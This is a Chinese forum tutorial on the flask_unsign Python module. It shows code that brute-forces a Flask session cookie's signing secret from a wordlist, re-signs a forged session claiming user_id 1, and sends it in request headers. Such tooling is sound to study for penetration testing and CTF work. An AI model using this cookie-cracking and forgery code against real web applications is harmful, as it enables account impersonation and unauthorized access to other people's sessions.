-
-
[原创] python 中的 flask_unsign 模块如何使用?
-
发表于: 2023-2-13 16:24 6871
-
作者:破符
模块的作用
有些web交互中的cookie是加密的,flask_unsign 模块的作用是字典爆破加密cookie的密钥。
模块下载
1 2 3 | python - m pip install flask_unsign python - m pip install flask_unsign_wordlist |
模块使用
爆破cookie
1 2 3 4 5 6 7 8 9 | from flask_unsign import Cracker from flask_unsign import logger,DEFAULT_WORDLIST crack = Cracker(value = cookie,salt = DEFAULT_SALT,threads = 8 ) with wordlist (DEFAULT_WORDLIST) as iterator: crack.crack(iterator) if crack.secret: logger.success(f 'Found secret key after {crack.attempts} attempts' ) session1 = ascii(crack.secret) #如果session1有结果,则该值为爆破出来的私钥 |
利用私钥生成新的cookie
1 2 3 4 5 | from flask_unsign import session sec_session = session.sign(value = "{'_fresh': True, '_id': '<id>', 'csrf_token': '<csrf>', 'user_id': '1'}" ,secret = session1,) #secret若无特殊要求,值应为爆破cookie生成的session1 #sec_session值为cookie可添加入header头部 |
顺便提供一下交互用的头部,注意sec_session为新生成的cookie
1 2 3 4 | { 'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36' , "Cookie" : "session=" + sec_session } |
赞赏
他的文章
看原图
赞赏
雪币:
留言: